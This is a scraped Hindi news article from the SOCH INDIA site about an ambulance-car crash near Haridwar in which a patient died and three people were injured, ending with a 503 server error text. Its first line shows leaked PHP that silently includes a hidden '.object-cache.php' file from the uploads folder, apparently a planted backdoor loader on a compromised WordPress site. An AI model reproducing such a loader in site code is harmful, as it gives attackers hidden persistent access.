add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); हरिद्वार में हादसा: एंबुलेंस और कार की हुई भिड़ंत, मरीज ने मौके पर ही तोड़ा दम, चालक सहित तीन घायल – SOCH INDIA
Menu

हरिद्वार में हादसा: एंबुलेंस और कार की हुई भिड़ंत, मरीज ने मौके पर ही तोड़ा दम, चालक सहित तीन घायल

nobanner

विस्तार

मरीज को अस्पताल ले जा रही एंबुलेंस की एक कार से भिड़ंत हो गई। इस हादसे में मरीज ने मौके पर ही दम तोड़ दिया। वहीं एंबुलेंस व कार चालक सहित तीन लोग घायल हो गए। सूचना मिलने पर मौके पर पहुंची पुलिस ने घायलों को अस्पताल में भर्ती कराया। जहां तीनों घायलों का इलाज चल रहा है।

वहीं गॉर्ड जगजीत सिंह के शव का पंचमाना भरने के बाद पोस्टमार्टम को भेज दिया गया है। कार्यवाहक कोतवाल नितिश शर्मा ने बताया कि घायलों की हालत ठीक है। सोमवार को एक कंपनी में तैनात गॉर्ड जगजीत सिंह निवासी चिडियापुर लक्सर की ड्यूटी पर तबीयत खराब होने के बाद उन्हें एंबुलेंस से अस्पताल ले जाया जा रहा था। इसी दौरानप रानीपुर झाल के पास पहुंची एंबुलेंसकी दूसरी तरफ से आ रही  एक कार से भिड़ंत हो गई।

एंबुलेंस सड़क पर जा पलटी। इस हादसे में मरीज ने मौके पर ही दम तोड़ दिया। वहीं एंबुलेंस चालक व गॉर्ड का साथी घायल हो गए। जिनका भूमानंद अस्पताल में उपचार चल रहा है। कार का चालक भी घायल है। एंबुलेंस चालक परमात्मा, दूसरा गॉर्ड सतवीर व कार का चालक गौतम निवासी आवास विकास ऋषिकेश घायल हो गए हैं।

ये भी पढ़ें…सोनिया से कैसे नजरें मिलाऊंगा: फिर छलका हरीश रावत का दर्द, कहा- दिल्ली जाने की कल्पना मात्र से ही मन भारी

सूचना मिलने पर पहुंची पुलिस ने घायलों को  एंबुलेंस से अस्पताल में भर्ती कराया। जहां तीनों घायलों का इलाज चल रहा है। वहीं गॉर्ड जगजीत सिंह के शव का पंचमाना भरने के बाद पोस्टमार्टम को भेज दिया गया है। कार्यवाहक कोतवाल नितिश शर्मा ने बताया कि घायलों की हालत ठीक है।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.